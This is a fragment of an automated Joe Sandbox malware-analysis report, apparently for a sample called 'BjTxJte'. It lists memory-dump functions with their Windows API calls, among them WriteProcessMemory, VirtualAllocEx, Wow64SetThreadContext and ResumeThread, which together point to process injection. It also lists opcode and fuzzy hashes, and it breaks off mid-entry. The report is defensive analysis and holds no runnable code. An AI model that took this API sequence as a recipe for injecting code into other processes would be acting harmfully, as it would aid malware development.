                                  • Opcode Fuzzy Hash: e5b70bec268d8a98aa968b881c37eb5dcfcf76b746b546ba5c99c42c17e51b1a
                                  • Instruction Fuzzy Hash: AF8168B0A00B058FDB28DFA9D041B5ABBF1FF88300F10892DE09AD7A50D774E945CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DE22E2
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321080197.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4de0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: b6ffe79afede38c72afbbdb889504be3d2db91c69d1f210c46c5ca7602933caf
                                  • Instruction ID: 52f1fa8fda45429a0670950b20ec30db99b3d28e479393f46cca7120fff94a8e
                                  • Opcode Fuzzy Hash: b6ffe79afede38c72afbbdb889504be3d2db91c69d1f210c46c5ca7602933caf
                                  • Instruction Fuzzy Hash: 1B51B2B1D003499FDB14DF9AC884ADEBBF5FF48310F24856AE819AB210D775A845CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DE22E2
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321080197.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4de0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 35f0ae21e03fbe93ee79670670f4381b03c3f188de2fddc524b9ace03b5ed219
                                  • Instruction ID: 82c2bb48545e0be5bc4bfeece5a088b62f6ae7a15b97bfcf0bcc1af79551904a
                                  • Opcode Fuzzy Hash: 35f0ae21e03fbe93ee79670670f4381b03c3f188de2fddc524b9ace03b5ed219
                                  • Instruction Fuzzy Hash: 9E51D2B1D00309DFDB14DFAAC980ADEBBB5FF48310F24852AE818AB210D774A845CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04DE4861
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321080197.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4de0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: 069975d42be3c1d6b4d593fef273b07c0871e9e94a86438af3534fc44a4cc43b
                                  • Instruction ID: b6c9cae4a61012abb528ec4e43dafb92023d2949ca14ecc1376230d17ddecf50
                                  • Opcode Fuzzy Hash: 069975d42be3c1d6b4d593fef273b07c0871e9e94a86438af3534fc44a4cc43b
                                  • Instruction Fuzzy Hash: D64116B4A00249DFDB14DF9AC488AAABBF5FF88314F24C459D519AB321D374E841CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00CC59C9
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 0b63a4e43a44aea14706bd6c65728177e61db330cc301ea5f9296477812d0a9a
                                  • Instruction ID: ebbfba52139e408b6aa42ba4e200782f91e394f56c35a4321e946c84ebfad418
                                  • Opcode Fuzzy Hash: 0b63a4e43a44aea14706bd6c65728177e61db330cc301ea5f9296477812d0a9a
                                  • Instruction Fuzzy Hash: 3F41F3B0C0071DCBDB24CFAAC844B9DBBF5BF49304F20816AD419AB255DBB56986CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00CC59C9
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 6589574b5d28c1c1bfe27fc7ecec9e1c95551c1ef4d94d8eee8733543dc381b7
                                  • Instruction ID: 442e64a3cbffc8847682066f9ffddf0d6c2b8de2d6e9773701a8c1fb2ae7e0ff
                                  • Opcode Fuzzy Hash: 6589574b5d28c1c1bfe27fc7ecec9e1c95551c1ef4d94d8eee8733543dc381b7
                                  • Instruction Fuzzy Hash: ED4104B1C0071DCBDB24CFAAC844BDDBBB5BF49704F20816AD408AB255DBB56986CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0548D0B8
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 3c527d7a261aeb651e6ff32f0e523c9e40263cb2377bb90fb05500e18581295d
                                  • Instruction ID: ae426f8af2f0558d2bac17045030267b21d0c8a735f25b7c667a3dcb218c70e1
                                  • Opcode Fuzzy Hash: 3c527d7a261aeb651e6ff32f0e523c9e40263cb2377bb90fb05500e18581295d
                                  • Instruction Fuzzy Hash: 232113B1D013099FCB14DFAAC985BEEBBF5FF48310F50842AE919A7250C7789955CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0548D0B8
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 01e8f4cbf4a6d45f4c7ddfaac841092525e834e8f4fff2f6d4f34f16bd861f48
                                  • Instruction ID: 8e7224123875e3a764a7a858526c11e3339024e5565e838a107cbed01756eb0a
                                  • Opcode Fuzzy Hash: 01e8f4cbf4a6d45f4c7ddfaac841092525e834e8f4fff2f6d4f34f16bd861f48
                                  • Instruction Fuzzy Hash: 562125B1D013099FCB10DFAAC985BEEBBF5FF48310F50842AE919A7240C7789944CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CCDA06,?,?,?,?,?), ref: 00CCDAC7
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 1f49d8782662fa32ffe5bcf83eeac329a30af6686a4f6d9e67ba38c0345b2812
                                  • Instruction ID: b096368966621e69b1a1d3da2ef49803799a21b755ad7863ee52151c074741d1
                                  • Opcode Fuzzy Hash: 1f49d8782662fa32ffe5bcf83eeac329a30af6686a4f6d9e67ba38c0345b2812
                                  • Instruction Fuzzy Hash: 0421E5B5900208AFDB10CF9AD584ADEBBF9FB48310F14841AE915A3310D379A940DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0548CF0E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: ee12adf493e4bba204eaca4a93b88482955bec32193e793fb1ed5a326b18696a
                                  • Instruction ID: 6c9ba7ccb807c4d3e4ed2ddbf2769d67d33930045cf7f4de0503214ca8407dd4
                                  • Opcode Fuzzy Hash: ee12adf493e4bba204eaca4a93b88482955bec32193e793fb1ed5a326b18696a
                                  • Instruction Fuzzy Hash: 5C2168B1D002088FDB10DFAAC4847EEBBF4FF48314F14842AD519A7241CB789945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0548D198
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: a0e47650fd132ba1c4d829258e94ba6771212c1dec01503b8db465388c5ca11f
                                  • Instruction ID: 1f58b762ad3e176ccf056afabbff2091be7ff0a1230d211c0c7dbd14c845dba7
                                  • Opcode Fuzzy Hash: a0e47650fd132ba1c4d829258e94ba6771212c1dec01503b8db465388c5ca11f
                                  • Instruction Fuzzy Hash: 9521F5B1D012499FDB14DFAAC985AEEBBF5FF48310F50842AE519A7250C7789944CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0548D198
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 912219e5cf180430b64c3a8e714d98a6747a5343cea553da66fad2ac7386a2ea
                                  • Instruction ID: 556adf95783236dd70d770857b4db071fa55658568dadaebd2f0a2317f35521a
                                  • Opcode Fuzzy Hash: 912219e5cf180430b64c3a8e714d98a6747a5343cea553da66fad2ac7386a2ea
                                  • Instruction Fuzzy Hash: 992107B1D013499FDB10DFAAC985AEEFBF5FF48310F50842AE519A7250C778A944CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0548CFD6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 359c2e98f3f9aef59ef4b9126e51374153a72e4d3139d953d405e3378a5163f2
                                  • Instruction ID: c11f031103e8b7db7321bef9e5b34547e328640f5573f70c742c583ff1bd404a
                                  • Opcode Fuzzy Hash: 359c2e98f3f9aef59ef4b9126e51374153a72e4d3139d953d405e3378a5163f2
                                  • Instruction Fuzzy Hash: 1C214772D002499FCB10DFA9D845AEFBFF5EF88310F10881AE51AA7250C7799940CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CCB841,00000800,00000000,00000000), ref: 00CCBA52
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: e1706026e7d8744921ccceb440c12fc9127db262f016bfe686857fee6d8cfed3
                                  • Instruction ID: a6e4fb4b32108befdc534091d23849abdd3749f20f9ebe7b861bc2452bc8058f
                                  • Opcode Fuzzy Hash: e1706026e7d8744921ccceb440c12fc9127db262f016bfe686857fee6d8cfed3
                                  • Instruction Fuzzy Hash: 831114B6C003499FDB10CF9AD444B9EFBF8EB48310F10842EE519A7200C379A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0548CFD6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: dfe39d171254b095443c5a721fa377bb9b6137a9701660cfb607aaa672cc07ef
                                  • Instruction ID: 95faee0e8f46a73f7ea78846d4b03aa99f11271ca97cd25f9220b7e2197b0793
                                  • Opcode Fuzzy Hash: dfe39d171254b095443c5a721fa377bb9b6137a9701660cfb607aaa672cc07ef
                                  • Instruction Fuzzy Hash: F111F6759002499FDB10DFAAC845AEFBFF5EF48320F14841AE519A7250C779A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 62fa259f4bdb82c17240f852d90866f1eacf69616a02105af5d3fb08a6fe565c
                                  • Instruction ID: c2109b22632e153f8789fc78620f391ded7890efb8b7bb90fb9fe92eb66e964e
                                  • Opcode Fuzzy Hash: 62fa259f4bdb82c17240f852d90866f1eacf69616a02105af5d3fb08a6fe565c
                                  • Instruction Fuzzy Hash: 311146B1D002488BCB20DFAAC4457EFBFF4EF88324F24841AD519A7250CB799944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CCB841,00000800,00000000,00000000), ref: 00CCBA52
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c14e51bd9e0e5c8f6c45b490a30a7faa03960ae5a6e102c64df25e630fb26153
                                  • Instruction ID: d1446689f315a55b03a2fcd5c17127d73cee7861249b938e25130bb9d9215cbb
                                  • Opcode Fuzzy Hash: c14e51bd9e0e5c8f6c45b490a30a7faa03960ae5a6e102c64df25e630fb26153
                                  • Instruction Fuzzy Hash: 9E1112B6D002098FCB14CF9AD544B9EFBF5AB48310F10842ED529A7210C778AA45CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 33f037909ec0af3e11eeac310c28c92ce02ae239b2633d9fda1b8a32d520eb5b
                                  • Instruction ID: 9c801a76ff11b94c407b74a58939d0bce28d39d2d6c57d056f3ebd7dab944983
                                  • Opcode Fuzzy Hash: 33f037909ec0af3e11eeac310c28c92ce02ae239b2633d9fda1b8a32d520eb5b
                                  • Instruction Fuzzy Hash: F11128B1D002488BCB20DFAAC4457EFFBF5EF88720F10841AD519A7240CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00CCB7C6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 0e547ad9601b80a28ee8c6cf2c864ab7e260f9aff1059ece24479072b9498d20
                                  • Instruction ID: 1ffea79b760b0844df7ecd873ca530dcb166c98c1bde7cf930b6408c642f577c
                                  • Opcode Fuzzy Hash: 0e547ad9601b80a28ee8c6cf2c864ab7e260f9aff1059ece24479072b9498d20
                                  • Instruction Fuzzy Hash: 4B11DFB5C002498FCB10DFAAD444B9EFBF8EF89710F10845AD829B7610C379A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D1A125D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2325507551.000000000D1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D1A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_d1a0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: ef46918e3ae732272123d737754b8ca860f7375441cca895fae4818f72c5d3ba
                                  • Instruction ID: e7ab68d54cad13137796fd1bd04495c64554e8e61e5292ae6f72e5352700b106
                                  • Opcode Fuzzy Hash: ef46918e3ae732272123d737754b8ca860f7375441cca895fae4818f72c5d3ba
                                  • Instruction Fuzzy Hash: 8711B0B98003499FDB10DF99D585BEEBBF8FB58310F20841AD559A7210C379A984CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D1A125D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2325507551.000000000D1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D1A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_d1a0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: bd4760ed902554ef5cb90d5cb9be9213789017ea827e7bdd812429fdbf41954d
                                  • Instruction ID: 9d450b1e2b49bad17594366f232aa87e56b64f0117afbf67813ef0d12e2f3c96
                                  • Opcode Fuzzy Hash: bd4760ed902554ef5cb90d5cb9be9213789017ea827e7bdd812429fdbf41954d
                                  • Instruction Fuzzy Hash: B411D3B58003499FDB10DF9AD985BDEBBF8FB48320F20841AD518B7200C379A584CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nq
                                  • API String ID: 0-2756854522
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f24d60233b33fb0102742d80477216f5cc8b76fd1b62150a2c694a92758b312
                                  • Instruction ID: 7092488e7df0a6b09fbf571c73ec9c25437f7170022d8b0635de6da76fed9cf5
                                  • Opcode Fuzzy Hash: 1f24d60233b33fb0102742d80477216f5cc8b76fd1b62150a2c694a92758b312
                                  • Instruction Fuzzy Hash: 7D21BD30714B019FD735DF38D886AABB7E1FB45214F141E6AE0EACB641D760F8198B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 00fcb460eeb3ede9968acab4f18146edd069255a58da5b147068ab8bb2baa987
                                  • Instruction ID: f5f3db79dc648fc6b35d3e537c812bc41b60e08ed02c2600c790e5dd462aabdc
                                  • Opcode Fuzzy Hash: 00fcb460eeb3ede9968acab4f18146edd069255a58da5b147068ab8bb2baa987
                                  • Instruction Fuzzy Hash: 0121B531A10219EFDB05EFA4D8448DEBBB6FF8A304F054559E401BB265DF74A855CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7009fd66e34167ad7ce42d0c1e27f42a6b23b55ea29355318f66f071626d5f63
                                  • Instruction ID: 122b98453df0e4eaf63f0d489ad52823d66ec9ccf7cc3f407ec79a6f1deb1a15
                                  • Opcode Fuzzy Hash: 7009fd66e34167ad7ce42d0c1e27f42a6b23b55ea29355318f66f071626d5f63
                                  • Instruction Fuzzy Hash: 2121BE30610B019BD734DF39D882AABB7E1FB85214F041E2AE0EACB641D770F8098B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1811834b7258a7147605372fcadddb2a4d7fd8c7a6150b55eafd5997734a234e
                                  • Instruction ID: 246dcf6cf78209b7bb86bde61bd224332c39e2fdda0c018698bccf86d98b44b2
                                  • Opcode Fuzzy Hash: 1811834b7258a7147605372fcadddb2a4d7fd8c7a6150b55eafd5997734a234e
                                  • Instruction Fuzzy Hash: 61215032B055609FC7159B78C5506BE7FA5DFC5B1070544A9D8499B792CE24EC02C7D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2308852653.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c2d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b23f3c2f3fd5c14091f1c0da25ab1ed58cd1758a1c7985d832a055ee88f227da
                                  • Instruction ID: 03150cc90bdd0cac07a67fb0aeb47829503b3cc7f78d3ef4ef2e7ef9dc52847e
                                  • Opcode Fuzzy Hash: b23f3c2f3fd5c14091f1c0da25ab1ed58cd1758a1c7985d832a055ee88f227da
                                  • Instruction Fuzzy Hash: 6D213771504204DFDB05EF14E9C0F26BF65FBA8324F20C569E90B0B656C33AE856DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a78ca7368a6da5c021f0586d9500dd7430ca0ec7cfb03704fe24c68cd400da79
                                  • Instruction ID: f39855d4094e64a1de6617299d0757e0694b0e5caa2af741778f9d43ea265dde
                                  • Opcode Fuzzy Hash: a78ca7368a6da5c021f0586d9500dd7430ca0ec7cfb03704fe24c68cd400da79
                                  • Instruction Fuzzy Hash: 8F21D3303005104FFB04AB69D412B6E77E7EBC5B04F1444AEE502CB7A6CDB9AC42BB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1c66a379a978a4697fca95b46dd06e9be055bab17a932db922633c428281fd9
                                  • Instruction ID: 3d46e3985400c7540cf1831fcc3e4e954ce144fe09e39145cb13e46f64737254
                                  • Opcode Fuzzy Hash: d1c66a379a978a4697fca95b46dd06e9be055bab17a932db922633c428281fd9
                                  • Instruction Fuzzy Hash: D121D175E0021A8FEF04DFB8C8419EEBBF6EF89300B14456AD845F7295EB349A05C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2308927347.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c3d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64db78f72cb966d536b3c01bff5709ca5aaf6da0c427203a53a5bdd458078ded
                                  • Instruction ID: 009f0b67b0db6e3be89bf6ed28673025ba115992e00abb2d83b0a2c6762f90ec
                                  • Opcode Fuzzy Hash: 64db78f72cb966d536b3c01bff5709ca5aaf6da0c427203a53a5bdd458078ded
                                  • Instruction Fuzzy Hash: E1210471514204EFDB05DF24E9C0F26BBA5FB88314F20C5ADE94A4B296C33BDC46CA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2308927347.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c3d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43179ee129db58a31265fa8fb0b9122fb80e45533fd50a0dee73907fed494d6d
                                  • Instruction ID: 0b5161591c73a97ad720cb5d3b19f914d0f2b0d92ae70123bf8ca4b72ac761e8
                                  • Opcode Fuzzy Hash: 43179ee129db58a31265fa8fb0b9122fb80e45533fd50a0dee73907fed494d6d
                                  • Instruction Fuzzy Hash: E121F271614204DFCB18DF24E9C4B26BF65FB88714F20C569E94A4B296C33AD807CA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b0d24e2900c0374d7061a7e26e5db60e55c3cbb04fefb44297db33910f3f89e6
                                  • Instruction ID: 5755fe27e50298a5a2da76127d2b8da5961fefad5b122090ea7adde631212678
                                  • Opcode Fuzzy Hash: b0d24e2900c0374d7061a7e26e5db60e55c3cbb04fefb44297db33910f3f89e6
                                  • Instruction Fuzzy Hash: BA215031A106199FCB10EF6CD84499AFBB4FF49315B50C26AE958A7204FB30A998CBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5540c810eacda91d38b3b60f19727e82aa109a93629c979e6a5329c433a5385
                                  • Instruction ID: f65c4fae2ea9bc2775b27e77eec5960c602f8f8a074de68d4d27ac475c8be0eb
